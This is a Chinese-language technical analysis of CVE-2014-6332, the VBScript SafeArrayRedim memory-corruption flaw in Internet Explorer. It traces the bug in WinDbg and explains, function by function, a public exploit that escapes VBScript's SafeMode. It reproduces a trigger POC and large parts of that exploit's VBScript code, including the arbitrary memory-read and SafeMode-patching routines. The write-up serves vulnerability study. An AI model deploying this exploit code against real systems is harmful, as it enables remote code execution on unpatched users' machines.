0x01.1 漏洞简述
•编号:CVE-2014-6332•漏洞影响:远程代码执行(RCE)•CVSS 2.0:9.3
oleaut32.dll中SafeArrayRedim在进行数组重新定义时未对传入参数psaboundNew进行有效校验,以致可以越界读写,进而造成任意代码执行。
0x01.2 漏洞影响
Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1
0x01.3 修复方案
[MS14-064]https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-064
0x02 漏洞分析
0x02.1 分析环境
•OS版本:Windows 7 Service Pack 1•Internet Explorer版本:8.0.7601.17514•oleaut32.dll版本:6.1.7601.17514•vbscript.dll版本:5.8.7601.17514
0x02.2 前置知识
请移步Internet Explorer漏洞分析(三)[上]——VBScript Scripting Engine初探。
0x02.3 详细分析
分析所用POC如下:
<!doctype html><html lang="en"><head></head><body><script LANGUAGE="VBScript"> On Error Resume Next Dim arrayA() Dim size Dim over size = &h5 over = &h8000000 + size Redim Preserve arrayA(size) Redim Preserve arrayA(over) arrayA(size+1) = "Hello"</script></body></html>
打开该POC,使用WinDbg附加调试,于vbscript!RedimPreserveArray函数处设断,允许阻止的内容:
图1
执行到call oleaut32.dll!SafeArrayRedim处,跟进分析:
图2
首先是判断传入参数psa与psaboundNew均不为空:
图3
之后对psa.fFeatures,psa.cDims及psa.cLocks进行判断:
图4
call SafeArraySize计算数组元素占用空间大小:
图5
将psaboundNew写入psa.rgsabound中:
图6
调整后数组:
图7
计算调整后数组元素占用空间大小,减去原来数组元素占用空间大小:
图8
由于此时ebx=80000000,故执行结果为负数指令分支 :
图9
ole32!CRetailMalloc_Alloc函数用于为HeapAlloc传递参数并调用之:
图10
由于申请空间远远超过可分配空间大小,故分配失败,直接跳转到函数末返回错误值:
图11
由此,便可实现任意地址读写。
下面来看看正常执行流程,修改POC如下:
<!doctype html><html lang="en"><head></head><body><script LANGUAGE="VBScript"> On Error Resume Next Dim arrayA() Dim size Dim over size = &h6 resize = &h4 Redim Preserve arrayA(size) arrayA(0)="Jane" arrayA(5)="Alan" Redim Preserve arrayA(resize) IsEmpty(arrayA)</script></body></html>
调整后数组元素占用空间大小-原来数组元素占用空间大小=0x50-0x70=ffffffe0:
图12
对其取相反数后申请如此大小空间:
图13
之后将数组多余元素即arrayA(5)—arrayA(6)复制到此空间内:
图14
图15
call ole32!CRetailMalloc_Realloc重新分配堆块:
图16
总结:
1.SafeArrayRedim函数在未重新分配空间之前便将psaboundNew写入psa.rgsabound,用以传递给SafeArraySize函数计算调整数组元素大小2.sub ebx, [ebp+Size]及test ebx, ebx两条指令用于判断调整数组元素大小—原数组元素大小与零的关系,小于零/大于等于零进入不同分支处理3.neg [ebp+psaboundNew]对调整数组元素大小与原数组元素大小差值取相反数,将其传递给HeapAlloc函数分配相应大小堆块
POC中&h8000000(该值经过SafeArraySize函数计算后为0x80000000)正是利用以上三点,实现任意地址读写——test ebx, ebx与jge组合进行有符号数比较,neg对其取反仍为0x80000000。
0x02.4 利用分析
Exp来自[yuange]https://www.exploit-db.com/exploits/35229。
第一部分:
function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5)end functionfunction Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Nextend function......function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if '0x6f66 & 0xFFFFBFFF=0x2f66 If(type1=&h2f66) then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function
通过循环不断重新定义数组,扩大数组规模,直至数组aa与ab于内存中相邻(准确 来说,二者相差8字节):
图17
ab(0)=1.123456789012345678901234567890,该值转换IEEE浮点数可通过[IEEE 754 Calculator]http://weitz.de/ieee/ 计算:
图18
如此一来,可通过aa数组访问ab数组元素(由ab起始位置偏移8字节)。type1=&h2f66判断是由于GetVarType函数返回前会将vt与0xFFFFBFFF作与运算:
图19
第二部分:
myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0).......sub testaa()end subfunction mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function
先来看 i=testaa操作——将函数赋值给变量。简化版如下:
<!doctype html><html lang="en"><head></head><body><script LANGUAGE="VBScript"> On Error Resume Next sub testaa() end sub IsEmpty("Test") i = testaa i = null</script></body></html>
于vbscript!VbsIsEmpty断下:
图20
通过ba w 2 1dc9e68与ba w 4 1dc9e68+8两条指令对栈顶设断,第二次断下时,修改vt为0x4C:
图21
第三次断下:
图22
第四次断下,更改vt为0x01(VT_NULL = 0x0001):
图23
但其仍存储的是vbscript!CScriptEntryPoint对象,其后赋值给i。On Error Resume Next在此处尤为重要,是否加入该语句执行情况对比:
图24
未加入On Error Resume Next语句最终会调用CSession::ReportError:
图25
而不会执行后续i = null语句,感兴趣的读者可自行探索CScriptRuntime::RunNoEH函数,不在这里过多展开(该函数功能复杂,笔者仅是简单跟踪是否加入On Error Resume Next语句的执行流):
图26
开启任意读写后执行aa(a1)=i:
图27
ab(0)=6.36598737437801E-314:
图28
aa(a1+2)=myarray:
图29
ab(2)=1.74088534731324E-310:
图30
关于此处的调试可于vbscript!VbsIsEmpty函数设断,配合如下修改:
'isempty(ab) ab(0)=0 aa(a1)=i 'isempty("1") ab(0)=6.36598737437801E-314 'isempty("2") aa(a1+2)=myarray 'isempty("3") ab(2)=1.74088534731324E-310 'isempty("4")
第一次断下后,可获得数组元素存储位置:
图31
mydata=aa(a1):
图32
第三部分:
function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0)end function
该函数功能用于读取参数add指向内存,关键函数是cbLengthBstr(具体请参考Internet Explorer漏洞分析(三)[上]——VBScript Scripting Engine初探中的0x05 LenB函数一节)。ab(0)=1.69759663316747E-313:
图33
完成读取:
图34
第四部分:
function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function
第一次读取结果见上文图片,i=readmemo(i+16)第二次读取:
图35
该地址为vbscript!COleScript对象:
图36
通过循环于该对象偏移0x120之后搜寻0x0E,该值用于检查是否处于SafeMode:
图37
aa(a1+2)存储的是之前构造数组对象——myarray:
图38
myarray起始地址为0,rgsabound.cElements为0x7fff0000,故可读写vbscript!COleScript+0x170处内容:
图39
修改完成,进入GodMode,成功弹出notepad.exe。
